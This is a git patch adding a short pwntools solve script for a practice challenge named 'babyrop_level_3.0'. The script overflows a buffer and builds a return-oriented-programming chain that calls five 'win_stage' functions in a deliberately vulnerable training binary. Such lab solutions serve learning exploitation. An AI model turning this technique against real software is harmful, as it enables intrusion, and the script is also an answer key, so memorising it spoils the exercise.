From d047d4a1efc176ae7bfbc3a74eaba42c1cf2cd4d Mon Sep 17 00:00:00 2001
From: jc <jc@johncollins.cloud>
Date: Wed, 6 Aug 2025 15:15:18 +0300
Subject: [PATCH] solve script

---
 weiss_overlude/babyrop_level_3.0/a.py | 32 +++++++++++++++++++++++++++
 1 file changed, 32 insertions(+)
 create mode 100644 weiss_overlude/babyrop_level_3.0/a.py

diff --git a/weiss_overlude/babyrop_level_3.0/a.py b/weiss_overlude/babyrop_level_3.0/a.py
new file mode 100644
index 0000000..6cb5b63
--- /dev/null
+++ b/weiss_overlude/babyrop_level_3.0/a.py
@@ -0,0 +1,32 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+"""
+patchelf --replace-needed libcapstone.so.5 /usr/lib/x86_64-linux-gnu/libcapstone.so.4 babyrop_level_3_0
+"""
+
+context.binary = target = ELF("./babyrop_level_3_0", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# gadgets
+pop_rdi = lambda a: p64(0x402c63) + p64(a)
+
+# buf
+buf = b"A"*72
+buf += pop_rdi(1)
+buf += p64(target.sym.win_stage_1)
+buf += pop_rdi(2)
+buf += p64(target.sym.win_stage_2)
+buf += pop_rdi(3)
+buf += p64(target.sym.win_stage_3)
+buf += pop_rdi(4)
+buf += p64(target.sym.win_stage_4)
+buf += pop_rdi(5)
+buf += p64(target.sym.win_stage_5)
+s(buf)
+
+r.interactive()
\ No newline at end of file